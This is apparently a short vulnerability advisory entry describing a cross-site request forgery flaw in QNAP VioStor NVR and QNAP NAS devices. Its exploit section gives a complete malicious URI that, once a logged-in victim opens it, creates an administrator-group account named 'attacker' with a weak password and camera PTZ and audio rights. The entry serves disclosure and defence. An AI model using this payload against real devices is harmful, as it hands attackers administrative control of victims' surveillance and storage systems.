• info
• discussion
• exploit
• solution
• references

QNAP VioStor NVR and QNAP NAS Cross Site Request Forgery Vulnerability

To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.

The following example URI is available:

http://www.example.com/cgi-bin/create_user.cgi?OK=&function=USER&subfun=NEW&USERNAME=&NAME=attacker&PASSWD=12345&VERIFY=12345&create_user_list=admin&PTZ1=on&Audio1=on&PTZ2=on&Audio2=on&PTZ3=on&Audio3=on&PTZ4=on&Audio4=on